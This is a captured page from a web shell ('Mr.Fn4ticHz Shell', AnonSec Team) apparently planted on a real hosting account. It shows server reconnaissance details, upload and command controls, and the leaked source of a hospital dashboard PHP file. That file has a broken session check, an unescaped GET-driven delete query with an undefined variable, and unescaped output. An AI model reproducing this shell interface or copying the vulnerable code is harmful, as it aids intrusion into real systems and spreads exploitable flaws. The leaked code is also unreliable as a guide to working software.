Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 18.219.63.95
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in//hospital_dash.php
<?php
session_start();
include'dbconnection.php';
// checking session is valid for not 
if (strlen($_SESSION['id']==0)) {
  header('location:logout.php');
  } else{

// for deleting user
if(isset($_GET['id']))
{
$adminid=$_GET['id'];
$msg=mysqli_query($con,"delete from regi where id='$id'");
if($msg)
{
echo "<script>alert('Data deleted');</script>";
}
}
?><!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="">
    <meta name="author" content="Dashboard">
    <meta name="keyword" content="Dashboard, Bootstrap, Admin, Template, Theme, Responsive, Fluid, Retina">

    <title>Hospital Dashboard</title>
    <link href="assets/css/bootstrap.css" rel="stylesheet">
    <link href="assets/font-awesome/css/font-awesome.css" rel="stylesheet" />
    <link href="assets/css/style.css" rel="stylesheet">
    <link href="assets/css/style-responsive.css" rel="stylesheet">
    <link href="assets/css/new2.css" rel="stylesheet">
  </head>

  <body>

  <section id="container" >
      <header class="header black-bg">
              <div class="sidebar-toggle-box">
                  <div class="fa fa-bars tooltips" data-placement="right" data-original-title="Toggle Navigation"></div>
              </div>
              <?php include 'menufinal.php';?>
      <section id="main-content">
          <section class="wrapper">
          	<h3><i class="fa fa-angle-right"></i> Manage Users</h3>
				<div class="row">	                  	  	
                              <?php $ret=mysqli_query($con,"select * from regi");
							  $cnt=1;
							  while($row=mysqli_fetch_array($ret))
							  {?>
                              <div  class="account-details">
                              <div><label for="item">Id<span>*</span></label><input type="text" value="<?php echo $row['id'];?>"></div>
                              <div><label for="item">Hospitalname<span>*</span></label><input type="text" value="<?php echo $row['Hospitalname'];?>"></div>
                              <div><label for="item">SPOCNAME<span>*</span></label><input type="text" value="<?php echo $row['SPOCNAME'];?>"></div>
                              <div><label for="item">SPOCDESIGNATION<span>*</span></label><input type="text" value="<?php echo $row['SPOCDESIGNATION'];?>"></div>
                              <div><label for="item">EmailID<span>*</span></label><input type="text" value="<?php echo $row['EmailID'];?>"></div>
                              <div><label for="item">Mobilenumber<span>*</span></label><input type="text" value="<?php echo $row['Mobilenumber'];?>"></div>
                              <div><label for="item">Selectstate<span>*</span></label><input type="text" value="<?php echo $row['Selectstate'];?>"></div>
                              <div><label for="item">Selectdistrict<span>*</span></label><input type="text" value="<?php echo $row['Selectdistrict'];?>"></div>
                              <div><label for="item">Pincode<span>*</span></label><input type="text" value="<?php echo $row['Pincode'];?>"></div>
                              <div><label for="item">Sanctionedbed<span>*</span></label><input type="text" value="<?php echo $row['sanctionedbed'];?>"></div>
                              <div><label for="item">Hospitalparenttype<span>*</span></label><input type="text" value="<?php echo $row['Hospitalparenttype'];?>"></div>
                              <div><label for="item">Hospitaltype<span>*</span></label><input type="text" value="<?php echo $row['Hospitaltype'];?>"></div>
                              <div><label for="item">Registrationnumber<span>*</span></label><input type="text" value="<?php echo $row['Registrationnumber'];?>"></div>
                              <div><label for="item">Authorityregistered<span>*</span></label><input type="text" value="<?php echo $row['Authorityregistered'];?>"></div>
                              
                                  </div>
                                                                 
                            
                    
                    
                              <?php $cnt=$cnt+1; }?>
                             
                              </tbody>
                          </table>
                      </div>
                  </div>
              </div>
		</section>
      </section
  ></section>
    <script src="assets/js/jquery.js"></script>
    <script src="assets/js/bootstrap.min.js"></script>
    <script class="include" type="text/javascript" src="assets/js/jquery.dcjqaccordion.2.7.js"></script>
    <script src="assets/js/jquery.scrollTo.min.js"></script>
    <script src="assets/js/jquery.nicescroll.js" type="text/javascript"></script>
    <script src="assets/js/common-scripts.js"></script>
  <script>
      $(function(){
          $('select.styled').customSelect();
      });

  </script>

  </body>
</html>
<?php } ?>

Anon7 - 2022
AnonSec Team